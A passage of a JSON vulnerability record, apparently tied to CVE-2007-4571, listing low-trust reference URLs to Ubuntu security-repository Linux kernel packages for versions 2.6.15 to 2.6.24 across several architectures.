        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/usb-modules-2.6.22-15-generic-di_2.6.22-15.54_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-ubuntu-modules-2.6.22/scsi-firmware-2.6.22-15-powerpc64-smp-di_2.6.22-15.39_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.15/nic-updates-modules-2.6.15-52-powerpc-di_2.6.15-52.10_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/input-modules-2.6.20-17-generic-di_2.6.20-17.36_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-52-amd64-generic-di_2.6.15-52.67_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.20/linux-backports-modules-2.6.20-17-sparc64_2.6.20-17.12_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-52-amd64-server_2.6.15-52.67_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.15/linux-backports-modules-2.6.15-52-amd64-generic_2.6.15-52.10_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-2.6.20-17-server_2.6.20-17.36_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/serial-modules-2.6.22-15-386-di_2.6.22-15.54_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15-52.67_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/parport-modules-2.6.22-15-sparc64-di_2.6.22-15.54_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ufs-modules-2.6.15-52-powerpc64-smp-di_2.6.15-52.67_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-52-sparc64-di_2.6.15-52.67_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-52-686_2.6.15-52.67_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.15/scsi-updates-modules-2.6.15-52-amd64-generic-di_2.6.15-52.10_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-17-server_2.6.20-17.36_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/input-modules-2.6.22-15-powerpc-di_2.6.22-15.54_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/acpi-modules-2.6.22-15-generic-di_2.6.22-15.54_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-ubuntu-modules-2.6.22/nic-firmware-2.6.22-15-generic-di_2.6.22-15.39_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-image-2.6.22-15-generic_2.6.22-15.54_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/pata-modules-2.6.22-15-cell-di_2.6.22-15.54_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/message-modules-2.6.20-17-powerpc64-smp-di_2.6.20-17.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/pcmcia-storage-modules-2.6.22-15-386-di_2.6.22-15.54_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pcmcia-storage-modules-2.6.20-17-generic-di_2.6.20-17.36_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/multiverse/l/linux-restricted-modules-2.6.22/nvidia-glx-legacy-dev_1.0.7185+2.6.22.4-15.11_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-52-powerpc-smp_2.6.15-52.67_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-debug-2.6.20-17-generic_2.6.20-17.36_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/message-modules-2.6.22-15-generic-di_2.6.22-15.54_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.22/updates-modules-2.6.22-15-powerpc64-smp-di_2.6.22-15.16_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/floppy-modules-2.6.15-52-powerpc-di_2.6.15-52.67_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux-source-2.6.22/pata-modules-2.6.22-15-lpia-di_2.6.22-15.54_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/firewire-core-modules-2.6.22-15-cell-di_2.6.22-15.54_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/sata-modules-2.6.22-15-powerpc-di_2.6.22-15.54_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-firmware-2.6.20-17-sparc64-di_2.6.20-17.36_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-52-386-di_2.6.15-52.67_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-17_2.6.20-17.36_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.15/linux-restricted-modules-2.6.15-52-powerpc-smp_2.6.15.12-52.3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-firmware-2.6.20-17-sparc64-di_2.6.20-17.36_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/multiverse/l/linux-restricted-modules-2.6.22/nvidia-legacy-kernel-source_1.0.7185+2.6.22.4-15.11_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-52-k7_2.6.15-52.67_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.15/nvidia-glx-legacy-dev_1.0.7174+2.6.15.12-52.3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.22/linux-backports-modules-2.6.22-15-sparc64-smp_2.6.22-15.16_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/sata-modules-2.6.15-52-386-di_2.6.15-52.67_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nfs-modules-2.6.20-17-generic-di_2.6.20-17.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/crypto-modules-2.6.22-15-sparc64-di_2.6.22-15.54_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/floppy-modules-2.6.15-52-amd64-generic-di_2.6.15-52.67_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.15/nvidia-glx-legacy_1.0.7174+2.6.15.12-52.3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-52-powerpc64-smp-di_2.6.15-52.67_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fs-common-modules-2.6.15-52-powerpc64-smp-di_2.6.15-52.67_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/floppy-modules-2.6.22-15-cell-di_2.6.22-15.54_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-usb-modules-2.6.15-52-amd64-generic-di_2.6.15-52.67_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-17-generic_2.6.20-17.36_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/ppp-modules-2.6.22-15-generic-di_2.6.22-15.54_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-usb-modules-2.6.15-52-386-di_2.6.15-52.67_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-52-powerpc64-smp-di_2.6.15-52.67_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/parport-modules-2.6.20-17-powerpc64-smp-di_2.6.20-17.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-libc-dev_2.6.20-17.36_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/irda-modules-2.6.22-15-386-di_2.6.22-15.54_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/multiverse/l/linux-restricted-modules-2.6.15/nvidia-legacy-kernel-source_1.0.7174+2.6.15.12-52.3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/ipv6-modules-2.6.22-15-generic-di_2.6.22-15.54_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/ide-modules-2.6.22-15-powerpc64-smp-di_2.6.22-15.54_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-52-powerpc64-smp-di_2.6.15-52.67_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-52-386-di_2.6.15-52.67_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-52-powerpc-di_2.6.15-52.67_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-usb-modules-2.6.15-52-powerpc64-smp-di_2.6.15-52.67_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.20/nic-restricted-firmware-2.6.20-17-generic-di_2.6.20.6-17.31_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/multiverse/l/linux-restricted-modules-2.6.22/linux-restricted-modules-2.6.22-15-rt_2.6.22.4-15.11_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-52-sparc64-di_2.6.15-52.67_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/sata-modules-2.6.20-17-sparc64-di_2.6.20-17.36_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-usb-modules-2.6.22-15-generic-di_2.6.22-15.54_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-shared-modules-2.6.20-17-386-di_2.6.20-17.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-52-powerpc-di_2.6.15-52.67_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-modules-2.6.22-15-sparc64-di_2.6.22-15.54_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-52-powerpc64-smp-di_2.6.15-52.67_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2007-4571"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-shared-modules-2.6.22-15-cell-di_2.6.22-15.54_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/universe/l/linux-ubuntu-modules-2.6.22/linux-ubuntu-modules-2.6.22-15-xen_2.6.22-15.39_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/ipv6-modules-2.6.22-15-sparc64-di_2.6.22-15.54_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-shared-modules-2.6.20-17-sparc64-di_2.6.20-17.36_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/pcmcia-storage-modules-2.6.22-15-powerpc64-smp-di_2.6.22-15.54_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-52-powerpc-di_2.6.15-52.67_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-ubuntu-modules-2.6.22/nic-firmware-2.6.22-15-sparc64-di_2.6.22-15.39_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-52-386-di_2.6.15-52.67_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/speakup-modules-2.6.20-17-generic-di_2.6.20-17.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux-source-2.6.22/scsi-modules-2.6.22-15-lpia-di_2.6.22-15.54_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/firewire-core-modules-2.6.15-52-amd64-generic-di_2.6.15-52.67_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ide-modules-2.6.20-17-generic-di_2.6.20-17.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/cdrom-modules-2.6.20-17-generic-di_2.6.20-17.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/fat-modules-2.6.22-15-generic-di_2.6.22-15.54_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/firewire-core-modules-2.6.22-15-386-di_2.6.22-15.54_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/firewire-core-modules-2.6.22-15-powerpc64-smp-di_2.6.22-15.54_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-ubuntu-modules-2.6.22/linux-ubuntu-modules-2.6.22-15-cell_2.6.22-15.39_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/input-modules-2.6.20-17-generic-di_2.6.20-17.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-ubuntu-modules-2.6.22/ubuntu-modules-2.6.22-15-powerpc-di_2.6.22-15.39_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-52-386-di_2.6.15-52.67_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/input-modules-2.6.22-15-sparc64-di_2.6.22-15.54_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/serial-modules-2.6.15-52-powerpc64-smp-di_2.6.15-52.67_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-usb-modules-2.6.20-17-powerpc64-smp-di_2.6.20-17.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ipv6-modules-2.6.20-17-386-di_2.6.20-17.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/sata-modules-2.6.20-17-powerpc-di_2.6.20-17.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fb-modules-2.6.15-52-powerpc64-smp-di_2.6.15-52.67_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.15/linux-backports-modules-2.6.15-52-server-bigiron_2.6.15-52.10_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-52-powerpc-di_2.6.15-52.67_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/usb-modules-2.6.22-15-386-di_2.6.22-15.54_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux-source-2.6.22/acpi-modules-2.6.22-15-lpia-di_2.6.22-15.54_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-headers-2.6.22-15-xen_2.6.22-15.54_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/jfs-modules-2.6.15-52-386-di_2.6.15-52.67_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-modules-2.6.20-17-powerpc-di_2.6.20-17.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-debug-2.6.20-17-server_2.6.20-17.36_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.22/xorg-driver-fglrx_7.1.0-8.37.6+2.6.22.4-15.11_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/restricted/l/linux-restricted-modules-2.6.22/linux-restricted-modules-2.6.22-15-lpiacompat_2.6.22.4-15.11_lpia.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.24/linux-headers-lbm-2.6.24-18-386_2.6.24-18.16_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.24/linux-headers-lbm-2.6.24-18-virtual_2.6.24-18.16_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.24-18-sparc64-di_2.6.24-18.32_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-ubuntu-modules-2.6.24/linux-headers-lum-2.6.24-18-virtual_2.6.24-18.26_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.24-18-powerpc-di_2.6.24-18.32_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.24/nic-restricted-firmware-2.6.24-18-generic-di_2.6.24.13-18.41_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/ipv6-modules-2.6.24-18-generic-di_2.6.24-18.32_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.24-18-sparc64-smp_2.6.24-18.32_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/multiverse/l/linux-restricted-modules-2.6.24/linux-restricted-modules-2.6.24-18-xen_2.6.24.13-18.41_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-18-openvz_2.6.24-18.32_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.24-18-powerpc64-smp-di_2.6.24-18.32_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.24-18.32_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.24-18-386-di_2.6.24-18.32_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-ubuntu-modules-2.6.24/nic-firmware-2.6.24-18-generic-di_2.6.24-18.26_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.24-18-sparc64-di_2.6.24-18.32_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.24/linux-restricted-modules-2.6.24-18-server_2.6.24.13-18.41_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.24-18-sparc64-di_2.6.24-18.32_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.24-18-powerpc64-smp-di_2.6.24-18.32_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.24-18-386-di_2.6.24-18.32_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/universe/l/linux-ubuntu-modules-2.6.24/linux-headers-lum-2.6.24-18-rt_2.6.24-18.26_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-18-powerpc64-smp_2.6.24-18.32_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.24-18-386-di_2.6.24-18.32_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.24-18-powerpc64-smp-di_2.6.24-18.32_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.24-18-generic-di_2.6.24-18.32_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-18-386_2.6.24-18.32_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux-backports-modules-2.6.24/updates-modules-2.6.24-18-powerpc64-smp-di_2.6.24-18.16_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux-ubuntu-modules-2.6.24/linux-ubuntu-modules-2.6.24-18-powerpc-smp_2.6.24-18.26_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/socket-modules-2.6.24-18-powerpc-di_2.6.24-18.32_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-18-openvz_2.6.24-18.32_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-18-generic_2.6.24-18.32_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.24-18-generic-di_2.6.24-18.32_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-18-openvz_2.6.24-18.32_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-18-virtual_2.6.24-18.32_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/multiverse/l/linux-restricted-modules-2.6.24/nvidia-kernel-source_96.43.05+2.6.24.13-18.41_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-18-openvz_2.6.24-18.32_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.24/avm-fritz-kernel-source_3.11+2.6.24.13-18.41_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/restricted/l/linux-restricted-modules-2.6.24/linux-restricted-modules-2.6.24-18-powerpc-smp_2.6.24.13-18.41_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/universe/l/linux-backports-modules-2.6.24/linux-backports-modules-2.6.24-18-lpiacompat_2.6.24-18.16_lpia.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-18-generic_2.6.24-18.32_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.24-18-generic-di_2.6.24-18.32_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.24/linux-headers-lbm-2.6.24-18-server_2.6.24-18.16_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/universe/l/linux-backports-modules-2.6.24/linux-backports-modules-2.6.24-18-xen_2.6.24-18.16_amd64.deb"
      },
      {
